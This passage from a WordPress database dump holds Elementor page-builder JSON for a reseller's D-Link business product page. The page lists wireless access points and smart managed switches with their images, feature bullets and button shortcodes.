]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7543,3406,'_elementor_version','2.5.14'),(7544,3406,'_elementor_edit_mode','builder'),(7547,3407,'_wp_page_template','template-fullwidth.php'),(7548,3407,'_elementor_template_type','post'),(7549,3407,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"250\",\"right\":\"250\",\"bottom\":\"250\",\"left\":\"250\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" 